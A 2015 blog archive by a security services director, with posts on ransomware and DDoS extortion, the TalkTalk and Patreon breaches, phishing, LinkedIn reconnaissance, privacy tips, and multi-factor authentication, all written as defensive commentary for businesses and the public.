Wednesday 23 December 2015

Cyber security in 2016: Cyber extortion, data breaches and legal reform [Link - v3]

My comments around Cyber extortion were used in an interesting article for v3.


Cyber extortion

The rapid expansion of online tools available for purchase on the dark web, including ransomware and denial of service (DoS) programs, will increase the threat of extortion.

"Ransomware and DoS attacks will increase in frequency in the next year. There have been a growing number of blackmail attempts, threatening a company's resources with distributed DoS attacks if they do not paid a sum of money," warned Andrew Tang, service director at MTI Technology.

"They do not demand high levels of technical ability and the rewards can be great. Many companies cannot afford lengthy downtime on their servers and will pay the sum demanded, even without any guarantee that the attackers will not return."

Tuesday 22 December 2015

Biggest security fails of 2015 and a look ahead to emerging threats in 2016

This year has seen IT security at the forefront of the news agenda for all the wrong reasons. Various breaches and hackings such as those on TalkTalk, Carphone Warehouse and Ashley Madison have heightened discussion around IT security and the protection required to counter virtual incursions.

However, many of the attacks over the course of the year were avoidable. Had the companies in question been more diligent over their testing and security protocols, some of the breaches would not have been as successful.  

Security fails of 2015

The biggest security failing of 2015 is arguably the vulnerability of companies to simple web application attacks. Organisations with large volumes of online customer interactions were targets for web application attacks, where cyber-criminals gain access to sensitive customer data. Techniques such as SQL injection and brute force techniques were used to access valuable data for fraud or resale to third parties.

The other security failing this year has been phishing attacks, a method that can result in malware entering a network, leading to data theft. Phishing attacks can come in the form of a legitimate email from a company that redirects the user to a fake external site. Personal information will then be requested and captured for future brute force attacks.

Prevention is simple

Following simple guidelines like OWASP is the first step to prevention. Regular testing of web facing applications before publishing them can also help avoid attacks such as TalkTalk.

Education within the company and targeted solutions aimed at monitoring data exfiltration should be a priority. A company’s security cannot be reliant on only using their security solutions as a shield – their workforce can and often will be a weak spot in their armor. Employee education on data governance, access and removal of data should be at the top of a company’s IT security resolutions for 2016.

Emerging security threats in 2016

As Ransomware threats are so effective, they are predicted to continue to increase in use in 2016, in conjunction with the level sophistication behind attacks.  This is especially the case, as corrective measures to protect from attacks are rarely in place.

In addition, DDoS (distributed denial-of-service) attacks aimed at extracting data have been getting stronger and harder to defend against, as shown by the high profile TalkTalk and Carphone Warehouse breaches.

There have also been a growing number of blackmail attempts, threatening a company’s resources with DDoS attacks, unless they receive a sum of money.

What is interesting is that these two techniques do not demand high levels of technical ability, but the rewards can be great. Many companies cannot afford lengthy downtimes on their servers and will pay the sum demanded, even without any guarantee that the same attackers will not return.

Who will they affect the most?

Ransomware can affect a majority of computer users.  Assuming you will not be a victim of a cyber-attack is a major mistake and the risk of such an attack should be taken seriously.

Blackmail attacks/DDoS attacks on the other hand, will be targeting medium to large sized companies, who have the budget to pay the ransom money.

Invaluable security solutions for businesses in 2016

As Ransomware is predominately distributed via email and internet, a sandboxing solution is essential. The relevant solution has to be able to scan emails and internet traffic delivered to computers on the network, remote workers using a VPN or BYOD users, who use wireless or mobile connections. 

An attacker using Ransomware infiltration techniques will execute with the user-credentials of the user who opens it, so there is a need to look at controlling administrative credentials of all computers, whether they are servers, workstations or laptops. 

Monday 21 December 2015

Cyber-Security Predictions for 2016 [Link - Information Security Buzz]

I was asked to write a piece about Cyber Security predictions for 2016, which was published on Information Security Buzz.


Cyber-security Predictions for 2016

What will be the emerging IT security threats in 2016 and do you expect as many or even more attacks as 2015?

Although Ransomware attacks have been talked about a lot in 2015, the number of attacks has risen significantly during Q4 2015. Ransomware attacks are so effective that the number of attacks will rise, as well as the level sophistication behind the attack. Especially as corrective measures to protect from the attack are rarely in place.

DDoS (distributed denial-of-service) attacks aimed at extracting data have been getting stronger and harder to defend against, as evidenced by the high profile TalkTalk and Carphone Warehouse breaches.

There have also been a growing number of blackmail attempts, threatening a company’s resources with DDoS attacks if they are paid a sum of money.

Ransomware and DDoS attacks will only increase in frequency in the next year. They do not demand high levels of technical ability and the rewards can be great. Many companies cannot afford lengthy downtimes on their servers therefore will pay the sum demanded, even without any guarantee that the same attackers will not return.

Who will they affect the most?

Ransomware can affect a majority of computer users. Assuming you will not be a victim of a cyber-attack is a major mistake, and the risk of such an attack should be taken seriously.

Blackmail attacks with a threat of DDoS attacks will affect medium to large sized companies who have the budget to pay the sum of money demanded. The transaction is usually in the form of crypto-currency, bitcoin.  The companies that have the same budget to invest in the right protection against these types of attacks are likely to be the ones under attacked.

What security solutions will become invaluable to businesses in 2016?

As Ransomware is typically distributed via email, an email sandboxing solution will be required. The relevant solution has to be able to scan emails whether they are being delivered to computers on the network, remote workers using a VPN or BYOD users, who use wireless or cellular connections. As Ransomware will execute with the user-credentials of the user who opens it, there is a need to look at controlling administrative credentials of all computers, whether they are servers, workstations or laptops.

How will the IT security cope with the lack of talent in the UK?

There is not a lack of talent in the IT Security sector, but rather qualified talent.  The challenges have been the roles that have been advertised where the skills required are beyond many technical people, or looking for specific certifications and accreditations.  I believe there are many good universities in the UK producing excellent candidates for IT Security, as well as many people with the right aptitude and attitude to learn. Although this may not give companies the “right” skillsets immediately, they can be learnt with the right program of education and mentorship.

Wednesday 2 December 2015

Questions about the Dark Web

What do large organisations need to understand about the dark web?

The term Dark Web has many sinister undertones, and can be use used for illegal activities.  The World Wide Web  that we know and use, is accessible by a browser and is indexed using software called crawlers.  Crawlers allow the sites such as Google to know where websites are and the sort of content they contain.  There are elements that can not be indexed such a dynamic content, which generates the content on the fly, which is often referred to as the Deep Web.

What do many fail to grasp at the moment?

The Dark Web contains sites that require specific software to access it, and the network is encrypted to conceal the activity whether through privacy concerns or to cover illegal activities.  It should also be considered that the Dark Web is tiny compared to the World Wide Web.  A recent article believed there are between 7,000 to 30,000 hidden sites on the Dark Web, equating to around 0.03% of the Web.

How can understanding this space help them stay secure? 

The Dark Web is often referenced as the location of where stolen credentials are sold.  Rather than monitor or access the Dark Web, it is more important to protect the data in the first place.  Personal Identifiable Information (PII) should be encrypted, so it would render the information to being gibberish to the perpetrator.  Many of the recent attacks, which have allowed thousands of records to be stolen have been achieved by using SQL Injection attacks.  If information needs to be accessible to the internet, ensure OWASP standards are followed, ensure the website is tested by a penetration testing organisation and ensure critical data is encrypted.

Monday 26 October 2015

TalkTalk Breach

On Friday 23rd October 2015, it came to light that TalkTalk, the telecommunications and internet provider was subject to a significant cyber-attack.

Some facts have come to light since the disclosure of the attack:

Third time’s a charm
The latest attack was the third cyber-attack in the past 12 months.  It is believe that that this attack has allowed the attacker to steal four million records.  It may also have been up to ten weeks, since the cyber-attack had occurred. 

DDoS as a cover
A DDoS (Distributed Denial of Service) attack was used to overwhelm the existing perimeter solutions.  The large volume of traffic will overwhelm perimeter solutions such as firewalls and IDS/IPS solutions which are there to scan and protect an organisation from malicious traffic.  It seems there was either no or an inappropriate/inadequate DDoS mitigation solution in place.  DDoS attacks are often used as a subterfuge to mask the real nature of the attack.  In this case, it looks like the attacker is flooding a website, whereas the underlying attack is to exfiltrate customer data.

SQL Injection?
It is widely believed that the attack was on the application available on the internet, and using web application testing tools, such as a form of SQL injection attack, were able to access the data.

SQL is a database application, and an SQL injection is the ability to run a query on a database.  Although very useful for database administrator, it gives malicious attackers the ability to query and export a whole database.  The ability to run SQL injection attacks, are typically due to bad administration practices and not properly protecting the database.

Comprehensive data on people
The customer data lost is incredibly comprehensive.  The list below shows the data the attacker was able to obtain.
  • Name
  • Address
  • Email Address
  • Telephone Number(s)
  • TalkTalk Account Number
  • TalkTalk Password
  • Bank Details
  • Partial Credit Card Details

The TalkTalk data wasn't encrypted, meaning the attacker was able to read all the above information.  The data was in clear text, offering no protection to the customer.

It is believed that the Police and BAE Systems are carrying out a forensic investigation on the attack, but this relies on how much of a digital footprint was left during the attack and whether it was recorded at the time.

As an organisation handling customer information, there are many actions that would help prior to an attack:

Identification of Data
With numerous databases, server shares, cloud storage solutions and user created data; identifying important information, such as customer’s PII (Personal Identifiable Information) and financial information is paramount.

Protection of Data
Once the important information has been identified, methods of protecting the data should be used.  Encryption of data, where the data is encoded using a unique key and can only be decoded with this key, makes the data useless without it.

Testing of Systems
As applications are exposed the internet, such as customer portals, these need to be tested by a third party organisation with little or no knowledge of the application.  A Web Application Penetration Test could have highlighted some of the shortcomings of the web facing applications, including testing for SQL injections.

When an organisation is under attack, a number of solutions could have prevented an attack similar to TalkTalk’s. 

Administrative Rights
It is often said that 100% of attacks have used administrative rights.  There are Privileged Access Management solutions, which will safeguard the administrative accounts, and will offer full traceability of which administrator has done what.  A typical attack will either use administrative credentials they have gained, or to elevate the administrative privileges of a normal user.

Protection from DDoS
A DDoS (Distributed Denial of Service) is normally used by a malicious attacker to take a web presence offline, making a web service inaccessible.  In the case of TalkTalk’s attack, it was use to cloak the underlying attack.  A hybrid DDoS mitigation solution could have prevented such an attack.

Intrusion Detection
There are Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) which is used to detect and identify malicious activity on the network, then try to block or stop that traffic, and report back.  These are available as standalone solutions or as part of a UTM (Unified Threat Management) or Next-Generation Firewall solution.  Sometimes the early warning of an attack can help prevent the loss from being so great.

Data Exfiltration
The data will need to be taken for a breach to have occurred, so a DLP (Data Loss Prevention) solution will monitor the vectors from which data can leave, such as web, email, USB, screenshots, printers, etc and if the monitored data leaves in an atypical fashion, it will be quarantined and administrators alerted.  

After the compromise, what options are available?

Logs & Forensics
Post attack, it’s important to know what has been lost and preventing it from happening again.  A SIEM (Security Information & Event Management) solution would be able to aggregate the logs from the various components of the network, and apply a level of intelligence to the data.  Some will be able to carry out a forensic analysis on the logs.

Understanding the attack will allow a more effective remediation plan to be created.

What now TalkTalk?
Reading the press following the TalkTalk attack, there is no understanding to the significance of the data loss.  Although there is no demand to encrypt the data, it doesn't mean that the information of your customers should not have been encrypted.

As a minimum, by pentesting the application to prevent the vulnerability, and encrypting the data so it's useless to the attacker, would have prevented TalkTalk from the media attention. 

There is a call for the government to do more to prevent the cyber-attacks, but as highlighted here the technologies are available to help prevent, gain visibility or slow down the attack.  The onus should not be on governments to protect the customer’s data, it should be the service provider.

Tuesday 20 October 2015

"Hunted" - Technology View [Link - MTI Bytes]

A piece I wrote has been edited and used on the work blog:


Channel 4’s new reality show Hunted has gripped my attention since the first episode launched 6 weeks ago.  I'm particularly surprised by the amount of surveillance there is in the UK, allowing people to be traced or ‘hunted’ using data from mobile phone and ATM usage, number plate recognition, and CCTV footage. What I've found more concerning however, is the oblivious nature of the contestants to the digital footprint they are leaving, not dissimilar to the naivety of employees when it comes to safeguarding corporate data.

So, in a world driven by technology, how do you protect your personal and corporate digital footprint?

1. Manage your devices
Gone are the days of owning one mobile device, we live in a society where people juggle a plethora of devices at any given time. The mobile phone in particular has become the hub of many people’s lives; 66 per cent of people now own a smartphone. In a short period of time the mobile phone has evolved to support all work and personal activity from sharing files to tracking fitness goals, as well as still holding its primary function of making calls.

Ensuring your device is backed up regularly, is one way to manage its contents and protects it against damage or thief. Backing up the device’s applications and data to a public cloud service safeguards contents but also adds an additional layer of security to your data.

2. Password protect
Irrespective of the abundance of recent security hacks, the show brings attention to the amount of people that still don’t have any security on their devices. Without any security measures, others can immediately access the device as well as personal and corporate data. Securing accounts with a password is an essential step to protecting data.

Using complex and different passwords across various accounts and devices also tightens security. Where possible, a two-step verification or authentication is preferable.

Applications such as KeePass can help remember any complex passwords you have.

3. Control browser history
If Internet anonymity is important, tools like the TOR network provide users with ability to hide identity and usage. Internet performance and connectivity can be affected by products such as TOR, therefore consider if the perceived cost of your history is worth it.

Browsers can also be set to delete search either automatically or manually, as the search history is automatically cached.  Most browsers have a secret search feature, whereby the history is not stored and neither are cookies. The issue with cookies is that the information is read by other services, often to advertise to. Remember, Internet history will never truly be private, as ISP will track sites visited.

4. Information control
The revelation of social media is leading to a generation of over-sharers. Think about the information you want on the Internet. Imagine what could happen if an unscrupulous person had access to your private information and what they could do with that information? Sharing information you may use for added security protection such as pet names etc. invites security threat.

It is essential to have prevention tools in place to control your digital footprint and to stop yourself from being ‘hunted’.

Thursday 15 October 2015

Another week, another data leak [Link - MTI Bytes]

Another piece I wrote for the work blog:

San Francisco-based crowdfunding platform, Patreon, is the latest casualty in a series of recent data breaches. The incident has seen hackers download and leak a 15GB user database containing names, addresses, email addresses and donation information. So far, the hack has exposed 2.3 million users and their personal data, with the exception of credit card details, passwords, social security numbers and tax information.

In response to the hack, Patreon Founder Jack Conte wrote:

“There was unauthorised access to registered names, email addresses, posts, and some shipping addresses. Additionally, some billing addresses that were added prior to 2014 were also accessed. We do not store full credit card numbers on our servers and no credit card numbers were compromised. Although accessed, all passwords, social security numbers and tax form information remain safely encrypted with a 2048-bit RSA key.”

The question arises: how can you protect certain data?

Importance of encryption

Due to Patreon safely encrypting the information using a 2048-bit RSA key, hackers have been unable to access or leak users’ passwords, social security numbers and tax information.

In other words, Patreon protect key information via a multi-level password scheme called ‘bcrypt’.  The key benefit of ‘bcrypt’ is that it is irreversible, which means it cannot be “decrypted”. In Patreon’s case, the failure of the company to store plaintext passwords explains why the hackers could access only certain types of information.

As a result of Patreon using ‘bcyrpt’, an added layer of security protects the information, enabling passwords and credit card details to remain safe despite the hack. This additional security minimises the damage of the hack by securely protecting the most valuable information – the credit card details of millions of users.

Protect the test environment

The belief is that a publicly available debug version of the Patreon website led to the Patreon hack. Essentially, some of the site remained open, as part of a test environment, rather than behind a firewall.

Patreon’s data compromise highlights that test environments exposed to the Internet are just as important as their live counterparts. Security therefore needs to be tight, even on test sites. Web application firewalls and Data Loss Protection (DLP) solutions can help prevent data from leaving the site, ensuring that it is kept secure and is often the first line of defense for any company.

While the Patreon hack is undeniably a terrible breach of security, the company’s use of ‘bcrypt’ is helping to contain the damage, and highlights to other businesses the importance of good security practice.

Wednesday 7 October 2015

How to minimise the risks of LinkedIn - The Hackers Research Tool [Link - SC Magazine]

I'm very proud the article I wrote was used by SC Magazine.


Staff need ongoing training in defending against the latest threats - which currently includes LinkedIn says Andrew Tang, service director, security at MTI Technology

LinkedIn, the social media platform, is proving to be a very useful networking tool for business professionals, with a growing database of approximately 380 million users worldwide. The site encourages members to freely share their CV, not just with their network but publically online.

It is also becoming an attractive platform for organised crime gangs.  Recently, there have been several cases where hackers have used information gathered from LinkedIn to plan targeted attacks on companies.

Hackers have been found posing as large corporations on the site to entice unsuspecting executives to divulge useful information. Sometimes the hackers don't even need to lure victims by posing as large corporations, they can gather enough personal information from public profiles to scam money or access sensitive corporate data.

These forms of attacks are proving to be a headache for security professionals. Despite having the best tools and processes in place, it is particularly hard to protect information that sits outside of the company network. It can also take months or even years to find the leak.

Risky business

Most employees are now well aware of the security risks associated with revealing too much personal information on social media sites such as Facebook. However, they often don't realise that revealing corporate information on LinkedIn can be equally risky to businesses.

LinkedIn pages can provide a considerable level of detail to potential cyber attackers: names, job titles, email addresses, partnering organisations, upcoming projects, and even hobbies and interests. At first glance, this information might seem relatively trivial but it can form part of the ‘cyber kill chain' and lead to malicious attacks.

LinkedIn informs the ‘plan of attack'. Employee and company profile pages can help hackers identify a target; source the names of executives and department heads; learn the email structure; as well as the names of affiliated companies. This leaves organisations vulnerable to a range of cyber-attacks including spear phishing.

Human error

Most worryingly perhaps, this issue isn't one that can be simply remedied with protective software. No technical solution can prevent an attacker from conducting an Internet search.

LinkedIn and other social media profiles are often among the first to appear in a list of search engine hits. Once the attacker has deployed the malicious software, cajoled an employee and gained remote access, the key goal is theft, whether the gain is more information, financial or data theft.

Education is the answer

As our virtual presence continues to grow, organisations need to make all employees aware of the potential risks of company details falling into the wrong hands. In order to mitigate the risks of social media sites, without blocking them, which will only frustrate employees, organisations must establish a clear security policy.

To safeguard company information and data, enterprises should educate employees about attending more closely to what they wish to make visible to whom.

If employees are informed then they are far more likely to be consciously aware of the risks as they go about their daily duties and knowing the rational, they are less likely to breach the policy.

The world of IT and security is certainly not static and training should not be a one off activity for new employees. Organisations should consider a continuing programme of education, updating the employees on new threats and breaches on a regular basis.

As more of our private lives are made public and readily available on the Internet, education becomes the vital component.

Wednesday 30 September 2015

“Hunted” - A technology view

How many of you have been watching Hunted on Channel 4?  I have been an avid viewer since the first episode and have to say it was an eye opener.  I was surprised how much surveillance there is in the UK, allowing people to be traced by mobile phone and ATM usage, number plate recognition, CCTV footage, but more concerning the digital footprint people were leaving, where every step could be traced.

The mobile phone has become the hub of many people’s lives, in a short period of time of being a device to make calls, it could then send text messages and play Snake, to being the hub of all communications, such as work email, personal email, social media, text and picture messages, video calls, tracking our movements for fitness, our music, video and photograph repositories, and we sometimes even use them for telephone calls!

I know that if I misplace my mobile phone, I’m at a loss, but that’s probably the subject of another blog post.  In the show, they talk about phone tapping and triangulation, but more concerning was how people didn’t have any security on their devices, allowing access immediately onto the device.

Smartphones are lost or damaged on a seemingly regular basis, but thankfully there is the option to back up the device’s applications and data to a public cloud service.  This functionality is offered by the main operating system providers, such as Google, Apple and Microsoft, as well as manufacturers such as HTC.  This can only be a good thing, except if someone has access to your password, where the backup can be restored.  This would give access to text messages, browser history, and other private and sensitive information.

Unless you are paranoid or technical, you probably have a web based email account provided by Google, Microsoft, Yahoo, etc, as the convenience of a web based email account outweigh any benefits of running your own mail server for your own domain.

Internet based services are easy to reach offering convenience, but also means that you are open to have your account compromised by a hacker.  On the show, one email account where access was gained immediately as the password was saved by the browser.  

A recent episode showed the use of a phishing attack, where a seemingly legitimate email was sent with a link, which led to a website asking for a password.  As most people use the same password for multiple websites, having one password can open access to many online accounts.

Google searches
In the show, internet searches were used to discover what the user was researching prior to being hunted.

I’ve never been worried about what I’ve been searching for on the internet, but if you are, there are privacy services offered by the major browsers.  Although it will mean that your searches are not cached and no cookies will be stored, the provider and the ISP (Internet Service Provider) you’re using will know, as they have to deliver this service.  

If Internet anonymity is important, the using tools like the TOR network, utilising their software and thousands of routers, there is the ability to hide identity and usage.  This can be great for privacy, but can be a threat to national security. 

Social media
The internet revelation of social media allowed to find our friends and share information.  For people to find you, you have to place a certain amount of information on the internet, but many people over share, leaving a lot of information about themselves on the internet.   

The researchers on the show used internet searches to see what they could find about the subject.  When that wasn't enough they also used the users devices for access to social media accounts, where again passwords were either saved by the browser or written down on a piece of paper nearby.

Location Services
The ability for your apps to have location information improves the app experience.  One of the primary uses is for mapping, allowing the device to be located on a map.  It’s not commonly know that location services are typically switched on for a mobile phone camera.  This has a use if you are taking a photograph to share on social media, telling everyone where the photograph was taken.  The downside, the properties of the photograph shows the location, which many not be useful if you don’t want people knowing where the photograph was taken.

I haven’t seen this used on the show, but would have been useful in locating people beyond the mobile phone triangulation and number plate recognition.

Protecting Mobile Devices 
Smartphones are ubiquitous, but are incredibly powerful devices we have in our pockets.  I met someone recently who didn't trust smartphones so has a non-smart mobile phone.  There are some simple measures that can be used to protect the device.  

Create a PIN or password for the device.  Yes, it can be a pain to have that, but it’s protecting the device and the contents.  You will be able to set the device to wipe itself if the incorrect PIN/password is entered incorrectly a number of times.

Ensure your device is backed up regularly, so even if the device is lost or stolen, the data won’t be.  The password for this cloud storage and cloud backup account must have a strong password, and there is often the option to use two-step verification where a code is sent via SMS to the registered mobile device.  If it’s too easy for you to access the account, it’s too easy for a hack to access it as well.

Protecting Email 
Sounds like simple advice, but harder to execute.  Use different complex passwords for each of your online accounts, don’t allow your browser to remember the passwords, and switch on two step or two factor authentication where possible.  

There are applications to help remember the complex passwords, but a popular one, KeePass was recently discovered to have a security flaw.  Just don't write down your passwords and certainly don't keep them next to your computer or tablet!

As ever, ensure the sites asking for your passwords are legitimate sites, and simply delete anything that looks “fishy”!

Protecting Browser History 
Browsers can be set to delete search either automatically or manually, as the search history is automatically cached.  Most browsers will have a secret search feature, where the history is not stored and neither are cookies, typically created when visiting a website.  The issue with cookies, is that they can be read by other services.  For example if you search for a computer game, you will see on subsequent websites advertisements for that game.  This information is stored on a cookie and being read by advertising services.  Keep in mind that sites visited will be tracked by ISP delivering the content, so the Internet history will never truly be private.

TOR can provide anonymity to the user, but the traffic and content can be seen on the exit node and performance can be poor, due to the bandwidth available.  It certainly won't offer the media and feature rich Internet experience we've come to expect.  If you have something to hide TOR maybe the way forward, but the sacrifice may not be worth it.

Protecting Social Media
Think about what information you want about your out on the internet.  Imagine if anyone could have full access to your profile, what could an unscrupulous person do with that information?  Is your password made up of your favourite team, band, child’s name, mother’s maiden name, pet’s name, etc?  Then think if that information is on your public profile?  Set privacy settings to ensure on the people you want can see the information you want them to.

Protecting Location Information
If you need to hide your location, but want to use Social Media?  Check the location services and whether they are enabled on your applications, especially your mobile/tablet apps.  Check the settings for your camera as well. Even if location services are stopped on Social Media, the properties of the photograph can still have the location of where it was taken, if the feature has not been disabled on the camera.

If you are really being hunted, then this is only basic advice, but much like the IT security adage, “It’s not if, but when you’re hacked”, it may well be; it’s not if they find you, but when!

Monday 28 September 2015

LinkedIn – the hacker’s research tool [Link - MTI Bytes]

Here is a repost of a piece I wrote for our work blog:


As of July 2015, LinkedIn has approximately 380 million users worldwide, a number that is continuing to grow. The social media platform is very useful for networking in the business world. It invites users to share their online CV with other industry professionals and establish contacts, publish industry commentary, and research potential employers or candidates.

The security risks of sharing personal details on other social media platforms like Facebook have been well documented, but for enterprises, LinkedIn can be equally dangerous. LinkedIn pages can provide a considerable level of detail to potential cyber attackers: names, job titles, email addresses, partnering organisations, upcoming projects, and even hobbies and interests. At first glance, this information might seem relatively trivial, but it forms part of the ‘cyber kill chain’ and can lead to malicious attacks.

For hackers, LinkedIn can inform the ‘plan of attack’. Employee and company profile pages can help hackers identify a target; source the names of executives and department heads; and learn the email structure; as well as the names of affiliated companies.

This leaves organisations vulnerable to a range of cyber attacks. One example is spear phishing: a targeted person receives an email inviting them to access a link, which initiates the installation of malicious software.

Socially engineered access
Emails from known sources (a colleague, for example) and information about hobbies, can instill confidence in the targeted individuals, making them more likely to click on the link.

The name drop of the company CEO could create a false air of familiarity, which might spur someone to act hastily and neglect to follow the correct channels. It’s not hard to imagine that an IT helpdesk might grant a ‘known employee’ remote access in response to a pleading call or email to finish time-sensitive work on a Friday afternoon.

This might provide the hacker with the name, job title, and email address of a company employee, all of which are readily accessible on LinkedIn. In return, he stands to make financial gains, steal data, or simply obtain secure company information.

Human error
Most worryingly perhaps is this issue isn’t one that can be simply remedied with protective software. No technical solution can prevent an attacker from conducting an Internet search. LinkedIn and other social media profiles are often among the first to appear in a list of search engine hits. Once the attacker has deployed the malicious software, cajoled an employee, or gained remote access, the key goal is theft, whether for more information, financial remuneration, or data.

Education is the answer
As our virtual presence continues to grow, there needs to be more awareness made inside organisations about the potential risks of basic company details falling into the wrong hands. To safeguard company information and data, enterprises should attend more closely to what they wish to make visible to whom.

As more of our private lives are made public and readily available on the Internet, education becomes the vital component. Organisations should be looking to provide this level of training to all employees, or risk the consequences.

Monday 7 September 2015

Multi-factor authentication – a smart approach to IT security [Link - MTI Bytes]

Here is a repost of a piece I wrote for our work blog:


Last week, I wrote about the need for businesses to rethink the use of secret questions as a security measure. The Web and social media create a goldmine of user information, which astute hackers can access to answer security questions.

So, what is a preferable alternative for proving a user’s identity? One of the more effective methods is multi-factor authentication.

What is multi-factor authentication? 

Multi-factor authentication is a security system that requires two or more independent credentials to verify a user’s identity.

A user might, for example, be required to provide information that they already know, such as a username, password or PIN. Combined with this, they may be asked to provide information given to them from a token or device – a passcode sent via SMS to a known mobile phone, for instance.

Other authentication methods rely on something on the user or where the user is located, through measures such as biometrics, iris scans, fingerprint readers and geo-location.

A combination of any of these methods results in multi-factor authentication. It is currently widely used for personal services such as emails and banking. And in the US, there have been calls for the method to be issued directly for all forms of Internet banking. Such is the confidence in this form of security.

What are the benefits of multi-factor authentication? 

1. Proof and compliance 

With multiple authentication methods in place, it becomes more difficult for hackers to access the service or website. It also makes it harder to deny an action.

For example, many online banking systems use a combination of passwords, PINs, tokens, SMS and unique codes, to ensure transactions are genuine. By using multi-factor authentication, banks can tie their compliance processes to specific users so the actions cannot be denied.

2. Protection can be free 

Service providers such as Apple's iCloud, Gmail, eBay and Facebook have options to switch-on a two-step verification process. If a user tries to login from a new device, browser or different country, they will be prompted to enter a code, sent to their registered mobile phone number.  The security is there and it is free in many cases!

3. Cloud support

As more cloud-based applications like Salesforce and Microsoft Office 365 enter the workplace, security will become a more complex concern for IT decision-makers. Multi-factor authentication has a critical role to play in addressing some of these concerns. In fact, there are already products available, such as SAML, which offer multi-factor authentication and are designed specifically to support cloud applications.

What are you waiting for? 

Multi-factor authentication presents a very clear upgrade from the simple security question method. The shift to a multi-factor authentication method will add an extra layer of protection against security breaches. - See more at:

Friday 4 September 2015

4 simple tips for bolstering your business’ security [Link - MTI Bytes]

Here is a repost of a piece I wrote for our work blog:


High-profile breaches continue to dominate the news agenda. Stories of compromises to email systems, retail outlets, Internet auction sites and Apple's iCloud service, show no online service is safe from hackers.

Many of these incidents are the result of accounts being far too easily accessible to hackers. Nowadays, these types of hacks are commonplace, and they will likely increase as social media uptake grows further. The more that users share personal information online, the more insecure security questions will become.

There are several issues associated with security question authentication that all businesses should address, through educating employees, as well as reviewing current security protocols and processes.

1. Avoid simple passwords

Despite repeated warnings from the IT industry, the most commonly used passwords in 2014 were ‘123456’ and ‘password’!  With the use of relatively simple passwords, IT security can be compromised within seconds using a dictionary attack.

2. Secret questions aren't so secret

On the surface, a personal security question may seem like a secure way to reset a password. However, what is often overlooked is the huge volume of personal information accessible via the Internet.

Consider, for example, the amount of information that Facebook alone archives about a user’s personal relationships, education, location, employment history and interests. Once a user’s information is out there, there is no way to control, edit or delete it.

A great example of this is the Paris Hilton phone-hacking scandal of 2005. In that case, the T-Mobile Sidekick device had an internet-facing dashboard. To recover their password, users had to answer security questions including what their date-of-birth and pet’s name was. In reality, all of Paris’ security questions could be answered via an Internet search engine!

3. Mix it up

There is always a balance between usability and complexity. We encourage people to use a mixture of upper and lower case letters, special characters and numbers. In reality, this usually results in more password resets, as complex passwords are easier to forget.

4. Be streetwise – does it seem phishy?

Users often receive emails that appear to be from their service provider. The email will stipulate an issue with their account and require an immediate password reset, change or confirmation.

The user will enter their password and be presented with a failed message screen or a confirmation. If the hacker is especially clever, they will synchronise the password with the service provider, so that everything appears normal.

Even with strong and complex passwords, users can still be victims of phishing.  To prevent phishing attacks, users should always check the legitimacy of emails before opening them. If it seems fishy (excuse the pun), ignore it or delete it.

Moving beyond security passwords

Security passwords were once a relatively secure concept. That was until the proliferation of digital technologies and social media took full effect. As security solutions become more complex, the methods of authentication will need to follow suit. In the next blog post, we’ll discuss how multi-factor authentication may be the way forward.

Monday 31 August 2015

Cloud services, Multi-factor authentication and the death of the security question

Mainstream news has covered many compromises of internet facing services over the last five years.  This has included compromises of email systems, retail outlets, Internet auction sites and last year Apple's iCloud service, which led to a number of private photographs being exposed to the public.  The first assumption was that iCloud was hacked or compromised, which Apple denied.

Accounts Compromised

Rather than iCloud in its entirety being compromised, the compromise was to individual accounts.  It is assumed that the celebrity accounts were compromised with a brute force attack, allowing multiple tries of various passwords to each account.  This meant with the right software toolset which could be acquired cheaply, meant that numerous passwords could be tried against each account.

Simple Passwords

Despite education from service providers and IT departments, the most commonly used passwords in a recent 2014 survey are "123456" and "password"!  With relatively simple passwords or common words, the password can easily be compromised quickly using a dictionary attack in a matter of seconds.

Security (?) Questions

There are many ways to recover a password.  It may be to request a new password and the service delivers the new password or asked for confirmation via an out of bound method, such as the registered email address or registered mobile number via SMS.  There may be a need to telephone a call centre and provide details over the telephone to reset your password.  The least secure is the ability to answer security questions that the user has the answer. 

It may seem like a secure way of resetting a password, as how many people would know your mother's maiden name, where you were born, what your favourite football team is, etc?  The internet and social media has been great in many respects, but it exposes a lot of information about an individual out into the wild.  Once it's out there, there is no way to control, edit or delete it.  Bear this in mind if you have to use to methodology for any website or application.

It would seem that this current compromise is a new thing, but something very similar happened over ten years ago when Paris Hilton's mobile phone was hacked in 2005.  How was this done?  The T-Mobile Sidekick device had an internet facing dashboard.  If you forgot your password, you could answer some security questions including date of birth and your pet's name.  All the security questions could be answered with an internet search engine.

Even before then, hackers were wise to how to gather this sort of personal information.  Around 15 years ago, there were email chains on how to generate your pornstar name.  You took your first pet's name and combine it with your mother's maiden name.  Information such as "Fido Jones" would have been very useful!

Complex Passwords, hard to remember?

As the levels of security have to rise, so this can only make it more difficult to use the services or applications.  There is always a balance between usability and complexity.  We can encourage people to use a mixture of upper and lower case, special characters and numbers, but will only mean more password resets these complex passwords will be forgotten more easily.

Also common advice is not to use the same password over multiple applications and services.  This only increases the users capacity to forget a password!


Even with strong and complex passwords in place, the user can still be a victim of a phishing attack.  We are reminded to check the legitimacy of an email before acting on it, and if it seems fishy (excuse the pun) to ignore it or delete it. Many people have fallen for one of the simplest tricks, as the email looks so legitimate.

The bad guy sends out emails that looks like an email from the service provider.  It tells the user that there is some sort of issue with the account that requires a password reset/change/confirmation.  The user will enter their password which is stored by the bad guy.  The user will be presented with either a failed message screen, a confirmation all is OK and if they were clever, even synchronise the password with the service provider, so all seems right for the user.

Multi Factor Authentication

There are various ways or factors, when authenticating users.  So one form this can take is "Something you know", where the information is known, such as username, password, PINs and patterns.  

Another form this information can take is "Something you're given", where the information is provided to the user through technology, such as a passcode from a token, a passcode from a device such as a smartphone or computer, or a passcode set via SMS to a known mobile telephone number.  If the known information and the provided information are different types of information, or factors, it becomes clear where the term two factor authentication comes from.  

Other factors can include "Something you are" through the use of biometrics, through iris scans, fingerprint readers, voice recondition and other forms tied to the physicality of the user.  There also ways of analysing "Somewhere you are" through the use of geolocation, thereby allowing or denying access by the users location.

A combination of these authentication methods, or factors create Multi Factor Authentication (MFA)

Proof and compliance

With the factors of authentication described above, it would be harder for a hacker to access the service or website, but would also make it hard to deny an action.  Many online banking systems uses a combination of passwords, PINs, tokens, SMS and unique codes to ensure transactions are genuine.  By using multi factor authentication, the processes within compliance processes can be tied to specific users and the actions cannot be denied.

Free protection

